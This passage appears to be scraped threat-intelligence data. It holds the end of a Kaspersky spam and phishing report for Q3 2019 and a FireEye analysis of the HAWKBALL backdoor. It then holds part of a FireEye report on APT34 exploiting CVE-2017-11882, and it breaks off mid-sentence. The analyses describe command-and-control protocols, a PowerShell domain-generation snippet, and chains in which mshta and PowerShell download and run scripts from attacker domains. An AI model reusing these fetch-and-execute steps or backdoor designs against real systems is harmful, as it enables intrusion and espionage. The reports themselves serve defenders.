launch\n\nIn September, Apple unveiled its latest round of products, and as usual the launch was followed by fans and scammers alike \u2014 we detected phishing emails in mail traffic aimed at stealing Apple ID authentication data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165908/spam-report-q3-2019-11.png>) \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165950/spam-report-q3-2019-12.png>)\n\nScammers also harvested users' personal data by sending spam messages offering free testing of new releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170022/spam-report-q3-2019-13.png>)\n\nThe number of attempts to open fake websites mentioning the Apple brand rose in the runup to the unveiling of the new product line and peaked on the actual day itself:\n\n_Number of attempts to open Apple-related phishing pages, September 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170048/spam-report-q3-2019-14.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170120/spam-report-q3-2019-15.png>)\n\n### Attacks on pay TV users\n\nTo watch TV or record live broadcasts in the UK, a license fee is payable. This was exploited by spammers who sent out masses of fake license expiry/renewal messages. What's more, they often used standard templates saying that the license could not be renewed because the bank had declined the payment.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170140/spam-report-q3-2019-16.png>)\n\nThe recipient was then asked to verify (or update) their personal and/or payment details by clicking on a link pointing to a fake data entry and payment form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170208/spam-report-q3-2019-17.png>)\n\n### Spam through website feedback forms\n\nThe website of any large company generally has one or even several feedback forms. These can be used to ask questions, express wishes, sign up for company events, or subscribe to newsletters. But messages sent via such forms often come not only from clients or interested visitors, but from scammers too.\n\nThere is nothing new about this phenomenon _per se_, but it is interesting to observe how the mechanism for sending spam through forms has evolved. If previously spammers targeted company mailboxes linked to feedback forms, now fraudsters use them to send spam to people on the outside.\n\nThis is possible because some companies do not pay due attention to website security, allowing attackers to bypass simple CAPTCHA tests with the aid of scripts and to register users en masse using feedback forms. Another oversight is that the username field, for example, accepts any text or link. As a result, the victim whose mailing address was used receives a legitimate confirmation of registration email, but containing a message from the scammers. The company itself does not receive any message.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170237/spam-report-q3-2019-18.png>)\n\nSuch spam started to surge several years ago, and has recently become even more popular \u2014 in Q3 services for delivering advertising messages through feedback forms began to be advertised in spam mailings.\n\n### Attacks on corporate email\n\nLast quarter, we observed a major spam campaign in which scammers sent emails pretending to be voicemail notifications. To listen to the supposed message, the recipient was invited to click or tap the (phishing) link that pointed to a website mimicking the login page of a popular Microsoft service. It was a page for signing either into Outlook or directly into a Microsoft account.\n\nThe attack was aimed specifically at corporate mail users, since various business software products allow the exchange of voice messages and inform users of new ones via email.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170256/spam-report-q3-2019-19.png>)\n\nIt is worth noting that the number of spam attacks aimed specifically at the corporate sector has increased significantly of late. Cybercriminals are after access to employees' email.\n\nAnother common trick is to report that incoming emails are stuck in the delivery queue. To receive these supposedly undeliverable messages, the victim is prompted to follow a link and enter their corporate account credentials on another fake login page, from where they go directly to the cybercriminals. Last quarter, our products blocked many large-scale spam campaigns under the guise of such notifications.\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Share of spam in global mail traffic, Q2 and Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170320/spam-report-q3-2019-20-en.png>)\n\nIn Q3 2019, the largest share of spam was recorded in August (57.78%). The average percentage of spam in global mail traffic was 56.26%, down 1.38 p.p. against the previous reporting period.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170903/spam-report-q3-2019-22-en.png>)\n\nThe TOP 5 spam-source countries remain the same as last quarter, only their percentage shares are slightly different. China is in first place (20.43%), followed by the US (13.37%) and Russia (5.60%). Fourth position goes to Brazil (5.14%) and fifth to France (3.35%). Germany took sixth place (2.95%), followed \u2014 with a gap of less than 0.5 p.p. \u2014 by India (2.65%), Turkey (2.42%), Singapore (2.24%), and Vietnam (2.15%).\n\n### Spam email size\n\n_Spam email size, Q2 and Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25171700/spam-report-q3-2019-23.png>)\n\nIn Q3 2019, the share of very small emails (up to 2 KB) in spam decreased by 4.38 p.p. to 82.93%. The proportion of emails sized 5-10 KB grew slightly (by 1.52 p.p.) against the previous quarter to 3.79%.\n\nMeanwhile, the share of 10-20 KB emails climbed by 0.26 p.p. to 2.24%. As for the number of 20-50 KB emails, their share changed more significantly, increasing by 2.64 p.p. (up to 4.74%) compared with the previous reporting period.\n\n### Malicious attachments in email\n\n_Number of Mail Anti-Virus triggerings, Q2 2019 - Q3 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25171804/spam-report-q3-2019-24-en.png>)\n\nIn Q3 2019, our security solutions detected a total of 48,089,352 malicious email attachments, which is almost five million more than in Q2. July was the most active month with 17 million Mail Anti-Virus triggerings, while August was the \"calmest\" \u2014 with two million fewer.\n\n_TOP 10 malicious attachments in mail traffic, Q3 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25172343/spam-report-q3-2019-25.png>)\n\nIn Q3, first place by prevalence in mail traffic went to the Office malware Exploit.MSOffice.CVE-2017-11882.gen (7.13%); in second place was the Worm.Win32.WBVB.vam worm (4.13%), and in third was another malware aimed at Microsoft Office users, Trojan.MSOffice.SAgent.gen (2.24%).\n\n_TOP 10 malware families, Q3 2019 (download)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25171905/spam-report-q3-2019-26.png>)\n\nAs for malware families, the Backdoor.Win32.Androm family (7.49%) claimed first place.\n\nIn second place are Microsoft Office exploits from the Exploit.MSOffice.CVE-2017-11882.gen family (7.20%). And in third is Worm.Win32.WBVB.vam (4.60%).\n\n### Countries targeted by malicious mailings\n\n_Distribution of Mail Anti-Virus triggerings by country, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25171931/spam-report-q3-2019-27-en.png>)\n\nFirst place by number of Mail Anti-Virus triggerings in Q3 2019 was retained by Germany. Its score increased by 0.31 p.p. to 10.36%. Vietnam also remained in the TOP 3, rising to second position (5.92%), and Brazil came in third just a tiny fraction behind.\n\n## Statistics: phishing\n\nIn Q3 2019, the Anti-Phishing system prevented **105,220,094** attempts to direct users to scam websites. The percentage of unique attacked users was 11.28% of the total number of users of Kaspersky products worldwide.\n\n### Attack geography\n\nThe country with the largest share of users attacked by phishers in Q3 2019 was Venezuela (30.96%), which took second place in the previous quarter and has since added 5.29 p.p.\n\n_Geography of phishing attacks, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25172232/spam-report-q3-2019-28-en.png>)\n\nHaving lost 3.53 p.p., Greece ranked second (22.67%). Third place, as in the last quarter, went to Brazil (19.70%).\n\n**Country** | **%*** \n---|--- \nVenezuela | 30.96 \nGreece | 22.67 \nBrazil | 19.70 \nHonduras | 17.58 \nGuatemala | 16.80 \nPanama | 16.70 \nAustralia | 16.18 \nChile | 15.98 \nEcuador | 15.64 \nPortugal | 15.61 \n \n_* Share of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country_\n\n### Organizations under attack\n\n_The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nFor the first time this year, the share of attacks on organizations in the Global Internet Portals category (23.81%) exceeded the share of attacks on credit organizations (22.46%). Social networks (20.48%) took third place, adding 11.40 p.p. to its share.\n\n_Distribution of organizations subjected to phishing attacks by category, Q3 2019._[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25172404/spam-report-q3-2019-29-en.png>)\n\nIn addition, the TOP 10 said goodbye to the Government and Taxes category.\n\nIts place was taken by the Financial Services category, which unites companies providing services in the field of finance that are not included in the Banks or Payment Systems categories, which cover providers of insurance, leasing, brokerage, and other services.\n\n## Conclusion\n\nThe average share of spam in global mail traffic (56.26%) this quarter decreased by 1.38 p.p. against the previous reporting period, while the number of attempted redirects to phishing pages compared to Q2 2019 fell by 25 million to just over 105 million.\n\nTop in this quarter's list of spam-source countries is China, with a share of 20.43%. Our security solutions blocked 48,089,352 malicious mail attachments, while Backdoor.Win32.Androm became the most common mail-based malware family \u2014 its share of mail traffic amounted to 7.49%.", "modified": "2019-11-26T10:00:16", "published": "2019-11-26T10:00:16", "id": "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "href": "https://securelist.com/spam-report-q3-2019/95177/", "type": "securelist", "title": "Spam and phishing in Q3 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2020-11-23T02:06:52", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.\n\nHAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.\n\nFigure 1 shows the decoy used in the attack.\n\n \nFigure 1: Decoy used in attack\n\nThe decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.\n\n \nFigure 2: Shellcode decryption routine\n\nThe decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP (Figure 3).\n\n \nFigure 3: Payload dropped as Word plugin\n\n#### Technical Details\n\nDllMain of the dropped payload determines if the string WORD.EXE is present in the sample\u2019s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe < C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\hh14980443.wll, DllEntry> using the WinExec() function.\n\nDllEntry is the payload\u2019s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:\n\n<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\\t<Hardcoded Digit>\\t<Hardcoded Digit>\\n\n\nExample:\n\n05/22 07:29:17 4 0\n\nThis log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).\n\n \nFigure 4: String format for log file\n\nThe encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.\n\n \nFigure 5: Config decryption routine\n\nThe IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:\n\n05/22 07:49:48 149.28.182.78.\n\n#### Mutex Creation\n\nThe malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify that the malware resolves the environment variable for %APPDATA%, it checks for the string **config/systemprofile.**\n\n \nFigure 6: Verify whether malware is running as a system profile\n\nIf the malware is running as a system profile, the string **d0c** from the decrypted config file is used to create the mutex. Otherwise, the string **_cu** is appended to **d0c **and the mutex is named** d0c_cu **(Figure 7).\n\n \nFigure 7: Mutex creation\n\nAfter the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.\n\n#### Network Communication\n\nHAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:\n\n * Content-Length: <content_length>\n * Cache-Control: no-cache\n * Connection: close\n\nThe malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.\n\n \nFigure 8: Network request\n\nThe network request is formed with four parameters in the format shown in Figure 9.\n\n**Format = \"?t=%d&&s=%d&&p=%s&&k=%d\"**\n\n \nFigure 9: GET request parameters formation\n\nTable 1 shows the GET request parameters.\n\n**Value**\n\n| \n\n**Information** \n \n---|--- \n \nT\n\n| \n\nInitially set to 0 \n \nS\n\n| \n\nInitially set to 0 \n \nP\n\n| \n\nString from decrypted config at 0x68 \n \nk\n\n| \n\nThe result of GetTickCount() \n \nTable 1: GET request parameters\n\nIf the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).\n\n**Format = \"?e=%d&&t=%d&&k=%d\"**\n\n \nFigure 10: Second GET request\n\n \nFigure 11: Second GET request parameters formation\n\nTable 2 shows information about the parameters.\n\n**Value**\n\n| \n\n**Information** \n \n---|--- \n \nE\n\n| \n\nInitially Set to 0 \n \nT\n\n| \n\nInitially set to 0 \n \nK\n\n| \n\nThe result of GetTickCount() \n \nTable 2: Second GET request parameters\n\nIf the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.\n\nThis Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor\u2019s command.\n\n \nFigure 12: Function table\n\nTable 3 shows the commands supported by HAWKBALL.\n\n**Command**\n\n| \n\n**Operation Performed** \n \n---|--- \n \n0\n\n| \n\nSet URI query string to value \n \n16\n\n| \n\nUnknown \n \n17\n\n| \n\nCollect system information \n \n18\n\n| \n\nExecute a provided argument using CreateProcess \n \n19\n\n| \n\nExecute a provided argument using CreateProcess and upload output \n \n20\n\n| \n\nCreate a cmd.exe reverse shell, execute a command, and upload output \n \n21\n\n| \n\nShut down reverse shell \n \n22\n\n| \n\nUnknown \n \n23\n\n| \n\nShut down reverse shell \n \n48\n\n| \n\nDownload file \n \n64\n\n| \n\nGet drive geometry and free space for logical drives C-Z \n \n65\n\n| \n\nRetrieve information about provided directory \n \n66\n\n| \n\nDelete file \n \n67\n\n| \n\nMove file \n \nTable 3: HAWKBALL commands\n\n#### Collect System Information\n\nCommand ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:\n\n * Computer Name\n * User Name\n * IP Address\n * Active Code Page\n * OEM Page\n * OS Version\n * Architecture Details (x32/x64)\n * String at 0x68 offset from decrypted config file\n\nThis information is retrieved from the victim using the following WINAPI calls:\n\n**Format = \"%s;%s;%s;%d;%d;%s;%s %dbit\"**\n\n * GetComputerNameA\n * GetUserNameA\n * Gethostbyname and inet_ntoa\n * GetACP\n * GetOEMPC\n * GetCurrentProcess and IsWow64Process\n\n \nFigure 13: System information\n\nThe collected system information is concatenated together with a semicolon separating each field:\n\nWIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit\n\nThis information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is **0xE5044C18**.\n\nOnce encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.\n\n \nFigure 14: POST request\n\nIn the request header, the field **Cookie **is** **set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.\n\nTable 4 shows the parameters of this POST request.\n\n**Parameter**\n\n| \n\n**Information** \n \n---|--- \n \nE\n\n| \n\nInitially set to 0 \n \nT\n\n| \n\nDecimal form of the little-endian XOR key \n \nK\n\n| \n\nThe result of GetTickCount() \n \nTable 4: POST request parameters\n\n##### Create Process\n\nThe malware creates a process with specified arguments. Figure 15 shows the operation.\n\n \nFigure 15: Command create process\n\n##### Delete File\n\nThe malware deletes the file specified as an argument. Figure 16 show the operation.\n\n \nFigure 16: Delete file operation\n\n##### Get Directory Information\n\nThe malware gets information for the provided directory address using the following WINAPI calls:\n\n * FindFirstFileW\n * FindNextFileW\n * FileTimeToLocalFileTime\n * FiletimeToSystemTime\n\nFigure 17 shows the API used for collecting information.\n\n \nFigure 17: Get directory information\n\n##### Get Disk Information\n\nThis command retrieves the drive information for drives C through Z along with available disk space for each drive.\n\n \nFigure 18: Retrieve drive information\n\nThe information is stored in the following format for each drive:\n\n**Format = \"%d+%d+%d+%d;\"**\n\nExample: \"8+512+6460870+16751103;\"\n\nThe information for all the available drives is combined and sent to the server using an operation similar to Figure 14.\n\n#### Anti-Debugging Tricks\n\n##### Debugger Detection With PEB\n\nThe malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.\n\n \nFigure 19: Retrieve value from PEB\n\n##### NtQueryInformationProcess\n\nThe malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:\n\n * Passing value 0x7 to ProcessInformationClass:\n\n \nFigure 20: ProcessDebugPort verification\n\n * Passing value 0x1E to ProcessInformationClass:\n\n \nFigure 21: ProcessDebugFlags verification\n\n * Passing value 0x1F to ProcessInformationClass:\n\n \nFigure 22: ProcessDebugObject\n\n#### Conclusion\n\nHAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.\n\n#### Indicators of Compromise (IOC)\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \nAC0EAC22CE12EAC9EE15CA03646ED70C\n\n| \n\nDoc.rtf \n \nD90E45FBF11B5BBDCA945B24D155A4B2\n\n| \n\nhh14980443.wll \n \n#### Network Indicators\n\n * 149.28.182[.]78:443\n * 149.28.182[.]78:80\n * http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>\n * http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>\n * http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>\n * Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)\n\n#### FireEye Detections\n\n**MD5**\n\n| \n\n**Product**\n\n| \n\n**Signature**\n\n| \n\n**Action** \n \n---|---|---|--- \n \nAC0EAC22CE12EAC9EE15CA03646ED70C\n\n| \n\nFireEye Email Security\n\nFireEye Network Security\n\nFireEye Endpoint Security\n\n| \n\nFE_Exploit_RTF_EQGEN_7\n\nExploit.Generic.MVX\n\n| \n\nBlock \n \nD90E45FBF11B5BBDCA945B24D155A4B2\n\n| \n\nFireEye Email Security\n\nFireEye Network Security\n\nFireEye Endpoint Security\n\n| \n\nMalware.Binary.Dll\n\nFE_APT_Backdoor_Win32_HawkBall_1\n\nAPT.Backdoor.Win.HawkBall\n\n| \n\nBlock \n \n#### Acknowledgement\n\nThank you to Matt Williams for providing reverse engineering support.\n", "modified": "2019-06-05T15:00:00", "published": "2019-06-05T15:00:00", "id": "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "href": "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html", "type": "fireeye", "title": "Government Sector in Central Asia Targeted With New HAWKBALL Backdoor\nDelivered via Microsoft Office Vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "description": "Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.\n\nWe believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.\n\nAPT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).\n\nIn this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.\n\nThe full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group \"OilRig\"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.\n\n#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability\n\nCVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.\n\nThe vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process instead of child process of Office applications. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. As the EQNEDT32.exe is compiled using an older compiler and does not support address space layout randomization (ASLR), a technique that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.\n\n#### Analysis\n\nAPT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. The overwritten instruction (displayed in Figure 1) is used to call the \u201cWinExec\u201d function from kernel32.dll, as depicted in the instruction at 00430c12, which calls the \u201cWinExec\u201d function.\n\n \nFigure 1: Disassembly of overwritten function address\n\nAfter exploitation, the \u2018WinExec\u2019 function is successfully called to create a child process, \u201cmshta.exe\u201d, in the context of current logged on user. The process \u201cmshta.exe\u201d downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.\n\n \nFigure 2: Attacker data copied to corrupt stack buffer\n\n#### Execution Workflow\n\nThe malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.\n\n \nFigure 3: CVE-2017-11882 and POWRUNER attack sequence\n\n 1. The malicious .rtf file exploits CVE-2017-11882.\n 2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.\n 3. The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt.\n 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.\n 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\\n 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.\n 7. cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.\n 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.\n 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.\n\nFigure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.\n\n \nFigure 4: Execution Workflow Section of v.vbs\n\nAfter successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. \n\n#### hUpdateCheckers.ps1 (POWRUNER)\n\nThe backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.\n\n \nFigure 5: POWRUNER PowerShell script hUpdateCheckers.ps1\n\nPOWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either \u201cnot_now\u201d or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. The command values and the associated actions are described in Table 1.\n\nCommand\n\n| \n\nDescription\n\n| \n\nAction \n \n---|---|--- \n \n0\n\n| \n\nServer response string contains batch commands\n\n| \n\nExecute batch commands and send results back to server \n \n1\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and upload (PUT) the file to server \n \n2\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and download (GET) the file \n \nTable 1: POWRUNER commands\n\nAfter successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.\n\nThe C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server.\n\n \nFigure 6: Powershell Screenshot Functionality\n\n#### dUpdateCheckers.ps1 (BONDUPDATER)\n\nOne of the recent advancements by APT34 is the use of DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA algorithm to generate subdomains for communication with the C2 server.\n\n#### DGA Implementation\n\nFigure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER\u2019s custom DGA.\n\n \nFigure 7: Breakdown of subdomain created by BONDUPDATER\n\n 1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));\n 2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.\n 3. Initially set to 000, then incremented by 3 after every DNS request\n 4. First 12 characters of system UUID.\n 5. \u201cB007\u201d hardcoded string.\n 6. Hardcoded domain \u201cmumbai-m[.]site\u201d\n\nBONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:\n\n 1. Create a temporary file in %temp% location\n * The file created will have the last two octets of the resolved IP addresses as its filename.\n 2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.\n\nCharacter\n\n| \n\nDescription \n \n---|--- \n \n0\n\n| \n\nFile contains batch commands, it executes the batch commands \n \n1\n\n| \n\nRename the temporary file as .ps1 extension \n \n2\n\n| \n\nRename the temporary file as .vbs extension \n \nTable 2: BONDUPDATER Actions\n\nFigure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation.\n\n \nFigure 8: Domain Generation Algorithm\n\nSome examples of the generated subdomains observed at time of execution include:\n\n143610035BAF04425847B007.mumbai-m[.]site\n\n835710065BAF04425847B007.mumbai-m[.]site\n\n376110095BAF04425847B007.mumbai-m[.]site\n\n#### Network Communication\n\nFigure 9 shows example network communications between a POWRUNER backdoor client and server.\n\n \nFigure 9: Example Network Communication\n\nIn the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response.\n\nIf the server had sent the string \u201cnot_now\u201d as response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.\n\n \nFigure 10: Example \"not now\" server response\n\n#### Batch Commands\n\nPOWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.\n\n \nFigure 11: Batch commands sent by POWRUNER C2 server\n\n#### Additional Use of POWRUNER / BONDUPDATER\n\nAPT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8)** **that exploited CVE-2017-0199. This file issued a GET request to download a malicious file 